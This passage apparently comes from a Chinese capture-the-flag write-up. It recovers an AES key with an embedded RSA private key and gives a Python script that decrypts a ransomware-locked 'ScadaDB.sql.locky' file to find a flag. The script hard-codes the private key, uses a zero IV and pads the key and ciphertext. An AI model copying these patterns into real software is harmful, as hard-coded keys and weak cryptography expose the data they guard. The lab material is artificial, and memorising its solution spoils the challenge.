MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----

可以解出key是:

1
cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=

使用 AES KEY 对文件 ScadaDB.sql.locky 进行解密。RSA + AES 解密的完整脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# -*- coding: utf-8 -*-
# @Author  : iker
# @Time    : 2024/03/04 16:10
# @Function: RSA Privatekey Decryption & AES CBC Decryption
import base64
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5


def rsa_decrypt(data):
    private_key = """-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----"""
    data = base64.b64decode(data)
    priobj = Cipher_pkcs1_v1_5.new(RSA.importKey(private_key))
    decrypted_data = priobj.decrypt(data,None)
    return decrypted_data


def padding(data):
    # style(string) – Padding algorithm.It can be ‘pkcs7’ (default), ‘iso7816’ or ‘x923’.
    if len(data) % AES.block_size != 0:
        return pad(data, AES.block_size, 'pkcs7')
    else:
        return data

def aes_cbc_encrypt(iv, key, data):
    key = padding(key)
    data = padding(data)
    iv = padding(iv)

    aes = AES.new(key, AES.MODE_CBC, iv)
    cipher_data = aes.encrypt(data)
    return cipher_data

def aes_cbc_decrypt(iv, key, data):
    iv = padding(iv)
    key = padding(key)
    data = padding(data)

    aes = AES.new(key, AES.MODE_CBC, iv)
    data = aes.decrypt(data)
    return data

def decrypt_file(encrypted_filepath,output_filepath,key):
    with open(encrypted_filepath, 'rb') as f:
        data = f.read()

    iv = b'\x00' * 16
    decryption_result = aes_cbc_decrypt(iv, key, data)

    with open(output_filepath, 'wb') as f:
        f.write(decryption_result)

if __name__ == "__main__":
    encryptedAesKey = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="
    key = rsa_decrypt(encryptedAesKey)
    encrypted_filepath = "ScadaDB.sql.locky"
    output_filepath = "ScadaDB.sql"
    decrypt_file(encrypted_filepath,output_filepath,key)

运行解密出ScadaDB.sql,flag4在数据库里

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!